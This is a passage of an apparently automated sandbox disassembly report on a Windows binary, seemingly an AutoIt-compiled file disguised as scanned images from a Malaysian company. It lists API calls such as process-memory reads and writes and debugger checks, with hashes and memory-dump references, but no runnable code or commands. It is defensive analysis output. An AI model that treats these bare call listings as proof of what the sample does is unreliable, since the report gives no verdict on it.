                                                          • Part of subcall function 00A819CC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A79778,?,?,00000034,00000800,?,00000034), ref: 00A819F6
                                                        • SendMessageW.USER32(?,0000102B,?,00000000), ref: 00A799EB
                                                        • SendMessageW.USER32(?,0000102B,?,00000000), ref: 00A79A10
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$MemoryProcessWrite
                                                        • String ID: @U=u
                                                        • API String ID: 1195347164-2594219639
                                                        • Opcode ID: 2d64a9fc8ab04e6fd331394bb04e24dd8d8170be59247c2eca7cb62569717f25
                                                        • Instruction ID: 236d9a597bdd59f8a5725106f14f743831cb46d5aa246d70594c73323e7c9a15
                                                        • Opcode Fuzzy Hash: 2d64a9fc8ab04e6fd331394bb04e24dd8d8170be59247c2eca7cb62569717f25
                                                        • Instruction Fuzzy Hash: E3010832900118ABEB20ABA4DC46EEABB7CDB04320F00816AF915A71D0DB705D55CBA0
                                                        APIs
                                                        • SendMessageW.USER32(?,00000406,00000000,00000000), ref: 00A79ADD
                                                        • SendMessageW.USER32(?,0000040D,?,00000000), ref: 00A79B10
                                                          • Part of subcall function 00A81997: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A797A7,?,?,00000800,?,00001073,00000000,?,?), ref: 00A819C1
                                                          • Part of subcall function 00A27D2C: _memmove.LIBCMT ref: 00A27D66
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$MemoryProcessRead_memmove
                                                        • String ID: @U=u
                                                        • API String ID: 339422723-2594219639
                                                        • Opcode ID: a0a2d9363c577e4564b70b44486533e0221b089d3d5dd62afe10fe417d2ff1c4
                                                        • Instruction ID: 51c0946f7c0a460ca7db08d284454257537f01ca18c7def2f062f73a884c14e2
                                                        • Opcode Fuzzy Hash: a0a2d9363c577e4564b70b44486533e0221b089d3d5dd62afe10fe417d2ff1c4
                                                        • Instruction Fuzzy Hash: 86015B71801128AFDB54EEA4DD81EEA77BCEB14340F40C0A6F689A6150DF314E9ACF90
                                                        APIs
                                                          • Part of subcall function 00A22612: GetWindowLongW.USER32(?,000000EB), ref: 00A22623
                                                        • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,00A5BB8A,?,?,?), ref: 00AAC8E1
                                                          • Part of subcall function 00A225DB: GetWindowLongW.USER32(?,000000EB), ref: 00A225EC
                                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00AAC8C7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$MessageProcSend
                                                        • String ID: @U=u
                                                        • API String ID: 982171247-2594219639
                                                        • Opcode ID: 86d633fd2c571b941eb59dc35cfb880d0bf7f125e53f7519e98ae49ff6fa966e
                                                        • Instruction ID: 4f178929b2b0f747955d57b54b8f4479ee5c99ce1ffd2b35a36e78c51c5bacc9
                                                        • Opcode Fuzzy Hash: 86d633fd2c571b941eb59dc35cfb880d0bf7f125e53f7519e98ae49ff6fa966e
                                                        • Instruction Fuzzy Hash: C501B131200214EBDB219F54DC84F6A3BA6FB9A364F144468F9510B2E0CB76A802EB91
                                                        APIs
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A79A2E
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A79A46
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3850602802-2594219639
                                                        • Opcode ID: 9a2343fb251bfb38ec352e0b24b693869d3f7e5cabc6c42843411382b577944b
                                                        • Instruction ID: 7f9cffd0ceae78286d78c5842aef1789a5121a28706eadedb7c7d75f59805638
                                                        • Opcode Fuzzy Hash: 9a2343fb251bfb38ec352e0b24b693869d3f7e5cabc6c42843411382b577944b
                                                        • Instruction Fuzzy Hash: ACE09B353433517AF63056554D4EFD75F5DDB89BA1F158036BB05991E1CBD14C4382E0
                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A7A1BA
                                                        • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00A7A1EA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3850602802-2594219639
                                                        • Opcode ID: 193286dea18f9817269544334c9918b36503aaff7ac2fa1f02135c6b124f643f
                                                        • Instruction ID: f6c23f46bf30e943bf6282d246e4af87d2090ad1e0076c68db73a46ed85a9ed7
                                                        • Opcode Fuzzy Hash: 193286dea18f9817269544334c9918b36503aaff7ac2fa1f02135c6b124f643f
                                                        • Instruction Fuzzy Hash: 46F08235240304BFFA156B949C46FEA3B19EB19751F008424F7055A0E1D6A25C405790
                                                        APIs
                                                          • Part of subcall function 00A79E2E: SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00A79E47
                                                          • Part of subcall function 00A79E2E: SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00A79E81
                                                        • SendMessageW.USER32(?,0000110B,00000005,00000000), ref: 00A7A34B
                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00A7A35B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3850602802-2594219639
                                                        • Opcode ID: 9beff3e6f58235128241479dbbe6614b111f9d315f54ed89a1826f57af1eefdd
                                                        • Instruction ID: ecdd368d154037157607217a390467b20845ef7822b57acd7489b68b11b2b78f
                                                        • Opcode Fuzzy Hash: 9beff3e6f58235128241479dbbe6614b111f9d315f54ed89a1826f57af1eefdd
                                                        • Instruction Fuzzy Hash: 47E0D8792043057FF6255FA19C4AEA7372CDB59751F118039B304450E0EFA28C506564
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ClassName_wcscmp
                                                        • String ID: #32770
                                                        • API String ID: 2292705959-463685578
                                                        • Opcode ID: de3470d74b172f5b7478ff5da30d9e8eca05610305c9522690204616080b3964
                                                        • Instruction ID: ce7f1cb07690d31f43b7409cf7a40fab6534a3fb8f925eaae93379e6215d0ee5
                                                        • Opcode Fuzzy Hash: de3470d74b172f5b7478ff5da30d9e8eca05610305c9522690204616080b3964
                                                        • Instruction Fuzzy Hash: 4CE02B329002292AD710D6D59C45AA7F7ACEB41721F000157FD10D3050E560990587E0
                                                        APIs
                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00A781CA
                                                          • Part of subcall function 00A43598: _doexit.LIBCMT ref: 00A435A2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Message_doexit
                                                        • String ID: AutoIt$Error allocating memory.
                                                        • API String ID: 1993061046-4017498283
                                                        • Opcode ID: 5bb7d4c1da29d66ee93414786131c29789f41f9f656c8c983d3bc9d9f7f36e9d
                                                        • Instruction ID: 71521f6b424dcc447e96325406cd575d9f76c777634ea42ee7f2ea623af3862b
                                                        • Opcode Fuzzy Hash: 5bb7d4c1da29d66ee93414786131c29789f41f9f656c8c983d3bc9d9f7f36e9d
                                                        • Instruction Fuzzy Hash: DBD02B323C531836D21433E82D0BFC63A4C4F05B11F404422BB08551C38ED584D242D9
                                                        APIs
                                                          • Part of subcall function 00A5B564: _memset.LIBCMT ref: 00A5B571
                                                          • Part of subcall function 00A40B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00A5B540,?,?,?,00A2100A), ref: 00A40B89
                                                        • IsDebuggerPresent.KERNEL32(?,?,?,00A2100A), ref: 00A5B544
                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00A2100A), ref: 00A5B553
                                                        Strings
                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A5B54E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                        • API String ID: 3158253471-631824599
                                                        • Opcode ID: 24af5bb398f91f8004a7608fc2e8ef16c54c3e019d7718ccf39adb5beafb2d7b
                                                        • Instruction ID: 766d7d2226e2f5a546832e675edb81a76d46f46918dc9cd86c15576901730460
                                                        • Opcode Fuzzy Hash: 24af5bb398f91f8004a7608fc2e8ef16c54c3e019d7718ccf39adb5beafb2d7b
                                                        • Instruction Fuzzy Hash: E6E06D706103118FD725DFA8E504B427BE0BB10746F00892CE857C6691E7B4D409CB71
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AA5BF5
                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00AA5C08
                                                          • Part of subcall function 00A854E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A8555E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: 897829ea03741627f4e2fc5d71ea01c84f8aa5c35449aae254141e5b0aa66a94
                                                        • Instruction ID: 57a20458417d93d563e3e6cb9e5c05fcb20d45670d0a76c57cb65986b5bb6919
                                                        • Opcode Fuzzy Hash: 897829ea03741627f4e2fc5d71ea01c84f8aa5c35449aae254141e5b0aa66a94
                                                        • Instruction Fuzzy Hash: 59D0C931788312BAE768BBF0AC4BF976A64AB11B51F000825B656AA1D0DAE46801C654
                                                        APIs
                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A798CB
                                                        • SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 00A798D9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3850602802-2594219639
                                                        • Opcode ID: 2627bbed889f8028b3c78092bab4bc3afc997237e53417349f4c9a48c2e60d27
                                                        • Instruction ID: 6f24a9edf5b06dcf39a946930c383f29efdd83bc586e22340ec840c5d806468f
                                                        • Opcode Fuzzy Hash: 2627bbed889f8028b3c78092bab4bc3afc997237e53417349f4c9a48c2e60d27
                                                        • Instruction Fuzzy Hash: 51C002311411C1BAEA255BB7AC0DD973E3DE7CBF52715016CB211950B587650096D664